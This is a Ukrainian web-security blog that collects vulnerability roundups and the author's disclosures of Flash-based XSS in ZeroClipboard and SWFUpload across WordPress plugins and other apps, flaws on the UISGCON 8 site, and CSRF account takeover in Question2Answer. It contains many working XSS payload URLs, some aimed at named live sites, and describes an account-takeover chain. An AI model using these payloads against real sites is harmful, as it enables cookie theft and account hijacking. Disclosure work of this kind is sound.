Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• RubyGems vulnerabilities (деталі)
• Vulnerability in Apache Maven 3.0.4 (деталі)
• DataWatch Monarch Business Intelligence (BI) v5.1 client section stored cross-site scripting (деталі)
• python-django security update (деталі)
• DataWatch Monarch Business Intelligence (BI) v5.1 Blind SQL injection (деталі)
• fusionforge security update (деталі)
• DataWatch Monarch Business Intelligence (BI) v5.1 Admin Section Blind XPath Injection (деталі)
• Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability (деталі)
• Icedtea-Web vulnerability (деталі)
• Multiple Vulnerabilities in PHP-Fusion 7.02.05 (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Audio Player, WP-Table Reloaded та Marekkis Watermark. Для котрих з’явилися експлоіти. Audio Player - це флеш аудіо плеєр, WP-Table Reloaded - це плагін для розміщення таблиць, Marekkis Watermark - це плагін для розміщення водяних знаків на зображення.

• Wordpress Audio Player Plugin XSS in SWF (деталі)
• WordPress WP-Table-Reloaded Cross Site Scripting (деталі)
• WordPress Marekkis Watermark Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У лютому, 20.02.2013, я знайшов Cross-Site Scripting уразливості в плагінах до WordPress, що містять ZeroClipboard.swf. Деякі плагіни також містять ZeroClipboard10.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard та про численні вразливі веб додатки з цією флешкою. Як я зазначав, це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в сотнях веб додатків.

Також вона міститься потенційно в сотнях плагінів для WordPress. Серед них Flash Gallery, Slidedeck2, WPClone, PayPal Digital Goods powered by Cleeng і Cleeng Content Monetization. Та існує багато інших уразливих плагінів до WordPress з ZeroClipboard. Як я зазначав у першому записі, після публікації XSS дірки в плагіні WP-Table Reloaded я звернув увагу на уразливості в цій флешці. Після публікації трьох записів на тему ZeroClipboard в лютому, я зробив паузу (перед наступними публікаціями), а тим часом у березні один дослідник оприлюднив численні уразливі WordPress плагіни з цією флешкою. В цьому списку багато плагінів, але це не вичерпний список, я знаходив багато інших уразливих плагінів з ZeroClipboard (в тому числі навів такі нижче).

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в попередньому записі).

1 Flash Gallery:

http://site/wp-content/plugins/1-flash-gallery/swf/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Slidedeck2 (всі Lite, Personal та Pro версії):

Папка плагіна може називитися slidedeck2, slidedeck-2.0, slidedeck2-personal та slidedeck2-pro. Містить файли ZeroClipboard.swf та ZeroClipboard10.swf.

http://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

WPClone:

http://site/wp-content/plugins/wpclone/lib/js/ZeroClipboard.swf?i?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

PayPal Digital Goods powered by Cleeng:

http://site/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Cleeng Content Monetization:

http://www.drchloecarmichael.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Це дуже поширена флешка. Якщо при стандартному пошуку через Гугл дорки можна знайти десятки тисяч сайтів з ZeroClipboard.swf чи ZeroClipboard10.swf, то при пошуку по плагінам для WordPress можна знайти сотні тисяч сайтів з цими флешками.

Вразливі наступні веб додатки з флешкою (всі версії, перевірялося в зазначених версіях): Flash Gallery 1.7.2, Slidedeck2 (всі Lite, Personal та Pro версії, виправлено в версії 2.1.20130306), WPClone 2.0.6, PayPal Digital Goods powered by Cleeng 2.2.4, Cleeng Content Monetization 2.3.2.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

01.09.2012

У серпні, 16.08.2012, я знайшов численні уразливості на сайті http://www.8.uisgcon.org, зокрема Full path disclosure, Directory Traversal та Cross-Site Scripting уразливості. Про що найближчим часом сповіщу адміністрацію сайта.

Це сайт секюріті конференції UISGCON 8. Торік я виступав з доповіддю на шостій конференції UISG. Якщо сайти сьомої та попередніх конференцій були більш безпечними, то для восьмої організатори вибрали дірявий движок (який прикрасили дірявими плагінами), тому й на сайті багато дірок.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

15.03.2013

Full path disclosure:

http://www.8.uisgcon.org/wp-content/plugins/floating-tweets/dcwp_floating_tweets.php
http://www.8.uisgcon.org/wp-content/plugins/floating-tweets/dcwp_floating_tweets_widget.php
http://www.8.uisgcon.org/wp-content/plugins/floating-tweets/skin.php?skin=1

Directory Traversal (Windows):

http://www.8.uisgcon.org/wp-content/plugins/floating-tweets/skin.php?widget_id=2&skin=11

DT дозволяє зчитувати лише css-файли (в папці /skins/ та підпапках). При відключених mq можна використати Null Byte Injection, що дозволить через DT зчитувати довільні файли.

XSS (persistent XSS):

В даному плагіні три persistent XSS дірки. Приклади експлоітів до Floating Tweets для WordPress.

Окрім вищенаведених, на сайті є ще багато інших дірок. Тільки FPD уразливостей було декілька сотень, про що я приватно повідомив власникам сайта разом з цими дірками.

Власники сайта ламерським чином проігнорували ці уразливості, навіть не відповівши мені. Лише через інших осіб передавши мені, що цим ламєрам, що забивають на безпеку свого секюріті сайта - конференції з інформаційної безпеки - не сподобалось, що я повідомив їм (причому неодноразово) про дірки на їхньому ресурсі. Лише через півроку вони повиправляли всі FPD дірки на сайті, включаючи в плагіні Floating Tweets, але інші дірки в цьому плагіні залишилися не виправленими.

У лютому, 17.02.2013, я знайшов Abuse of Functionality та Insufficient Anti-automation на сайті http://ping-admin.ru. Сервіси цього сайта можуть використовуватися для проведення атак на інші сайти. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

Abuse of Functionality:

Сервіси на сторінках http://ping-admin.ru/free_test/, http://ping-admin.ru/free_ping/, http://ping-admin.ru/free_seo/ можуть використовуватися для атак на інші сайти. Найбільше створють навантаження саме перший і третій сервіси (бо на відміну від пінга, вони викачують з цільового сайта цілу сторінку). А також для проведення DoS атаки на сервери самого сайта.

Insufficient Anti-automation:

У всіх трьох функціоналах немає захисту від автоматизованих запитів (капчі).

В даній добірці уразливості в веб додатках:

• Stack Overflow in DartWebserver.dll <= 1.9 (деталі)
• Multiple Cross-Site Scripting (XSS) in glFusion (деталі)
• Nova vulnerability (деталі)
• Remote Code Execution Vulnerability in MAKETEXT macro (деталі)
• Nova vulnerabilities (деталі)
• nagios metacharacter filtering omission (деталі)
• DataWatch Monarch BI v5.1 admin section reflected cross-site scripting (деталі)
• rubygem-ruby_parser: incorrect temporary file usage (деталі)
• DataWatch Monarch Business Intelligence (BI) v5.1 admin section stored cross-site scripting (деталі)
• Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities (деталі)

Раніше я писав про Content Spoofing та Cross-Site Scripting уразливості в SWFUpload. Це дуже популярна флешка, що використовується на десятках мільйонів сайтів та в сотнях веб додатків (таких як WordPress, лише один цей веб додаток використовується більше ніж на 62 мільйонах сайтів за даними wordpress.com).

Торік я писав про іншу XSS дірку в SWFUpload і зазначав, що існує багато інших веб додатків з вразливим SWFUpload. Всі вони вразливі до цих нових уразливостей, за виключенням swfupload.swf, що постачається з WordPress починаючи з версії 3.3.2.

Є декілька імен файлів SWFUpload: swfupload.swf, swfupload_f9.swf, swfupload_f8.swf, swfupload_f10.swf і swfupload_f11.swf. Багато веб додатків включають декілька файлів SWFUpload. Не всі ці флешки вразливі до нивих дірок: swfupload_f8.swf і swfupload_f9.swf не вразливі (вони не мають функціоналу buttonText).

Тому з них вразливі наступні веб додатки (та багато інших веб додатків):

swfupload.swf - Dotclear, XenForo, InstantCMS, AionWeb, Dolphin, SwfUploadPanel for TYPO3 CMS, SentinelleOnAir.

swfupload_f10.swf - SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition і Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter, SentinelleOnAir.

swfupload_f11.swf - SentinelleOnAir.

А також вразливий InfoGlue (про XSS уразливість в ZeroClipboard.swf в якому я писав минулого місяця), що також містить SWFUpload.

В SWFUpload є Content Spoofing та Cross-Site Scripting уразливості, як я зазначив у вищезгаданому записі. Це приклади даної XSS уразливості в різних веб додатках.

Cross-Site Scripting (WASC-08):

WordPress:

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dotclear:

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InstantCMS:

http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Swfupload for Drupal:

http://site/js/libs/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload11.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InfoGlue:

Попередні XSS уразливості:

http://site/webapp/applications/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f9.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Нова XSS уразливість:

http://site/webapp/applications/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Вразливі всі веб додатки з SWFUpload (v2.2.0.1 та попередні версії). Вразливі WordPress 2.7 - 3.3.1, XenForo 1.0.0 - 1.1.2 та потенційно всі версії Dotclear, InstantCMS, AionWeb, Dolphin, SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, що раніше називався Standard Edition, і Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter та SentinelleOnAir.

Для виправлення уразливості потрібно використати swfupload.swf з WordPress 3.3.2 та наступних версій (в цій флешці були виправлені як попередня XSS, так і ці CS та XSS уразливості).

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах CommentLuv, Ripe HD FLV Player та RLSWordPressSearch. Для котрих з’явилися експлоіти. CommentLuv - це плагін для розширення коментарів, Ripe HD FLV Player - це флеш відео плеєр, RLSWordPressSearch - це плагін для пошуку нерухомості на сайті.

• Cross-Site Scripting (XSS) Vulnerability in CommentLuv WordPress Plugin (деталі)
• WordPress Ripe HD FLV Player SQL Injection / Path Disclosure (деталі)
• WordPress RLSWordPressSearch SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У листопаді, 10.11.2012, я виявив Content Spoofing та Cross-Site Scripting уразливості в SWFUpload. Про що вже повідомив розробникам.

Торік я писав про XSS уразливість в swfupload в WordPress та в багатьох інших веб додатках. І це нові дірки в SWFUpload. Це дуже популярна флешка, що використовується на десятках мільйонів сайтів та в сотнях веб додатків (таких як WordPress, лише один цей веб додаток використовується більше ніж на 62 мільйонах сайтів за даними wordpress.com).

Є декілька імен файлів SWFUpload: swfupload.swf, swfupload_f9.swf, swfupload_f8.swf, swfupload_f10.swf і swfupload_f11.swf. Всі вони вразливі, за виключенням swfupload.swf, що постачається з WordPress починаючи з версії 3.3.2.

Content Spoofing (WASC-12):

http://site/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

Можна включати текст, зображення та html (наприклад, для link injection).

Cross-Site Scripting (WASC-08):

http://site/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Код виконається після кліку. Це strictly social XSS.

Вразливі всі версії SWFUpload - SWFUpload v2.2.0.1 та попередні версії. Та вразливі всі веб додатки, що використовують дані версії SWFUpload. Для виправлення уразливості потрібно використати swfupload.swf з WordPress 3.3.2 та наступних версій (в цій флешці були виправлені як попередня XSS, так і ці CS та XSS уразливості).

P.S.

Як я вияснив, дані CS та XSS уразливості були виправлені не в WordPress 3.3.2, а в WordPress 3.5.1. Тому версії 3.3.2 - 3.5 все ще вразливі, а в версії 3.5.1 вони включили оновлену версію SWFUpload, без згадки про це виправлення, лише згадали про це в версії 3.5.2.

29.11.2012

У жовтні, 21.10.2012, я виявив Abuse of Functionality, Insufficient Anti-automation та Cross-Site Request Forgery уразливості в Question2Answer. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в Question2Answer.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

01.03.2013

Abuse of Functionality (WASC-42):

http://site/login
http://site/forgot
http://site/reset

Можливий підбір логіна/емайла (вони обидва можуть використовуватися для аутентифікації). При відсутності такого логіна/емайла, система відповідає “User not found”.

http://site/account

Можливий підбір логіна/емайла (вони обидва можуть використовуватися для аутентифікації). Якщо є такий логін, система відповідає “This username is used”. Якщо є такий емайл, система відповідає “This e-mail is used”.

Insufficient Anti-automation (WASC-21):

http://site/login
http://site/forgot
http://site/reset

На даних сторінках немає захисту від автоматизованих запитів. Що дозволяє автоматизувати Abuse of Functionality атаки.

http://site/account

Це внутрішня сторінка. Тому для автоматизації підбору логінів або емайлів спочатку потрібно зайти в акаунт. В зв’язку з відсутністю капчі в логін формі, про що я писав в попередньому записі, можливий автоматизований логін. Тому перший POST запит відправляється до http://site/login для входу, а наступні POST запити відправляються до http://site/account для підбору логінів/емайлів.

Cross-Site Request Forgery (WASC-09):

Можна захопити акаунт користувача (в тому числі адмінський акаунт) відправивши CSRF запит до http://site/account. Після відправлення запиту даним експлоітом для зміни емайла, нападнику потрібно відновити пароль на свій емайл через функцію відновлення (http://site/reset).

Експлоіт:

Question2Answer CSRF.html

Комплексний експлоіт:

Question2Answer Exploit.txt

Уразливі всі версії Question2Answer (перевірялася версія 1.5.3). Як повідомив мені розробник, в версії Q2A 1.6 він планує додати захист від CSRF (і в січні він додав цей захист в останню dev-версію Q2A). В Question2Answer є ще багато інших уразливостей, на що я звернув увагу розробника.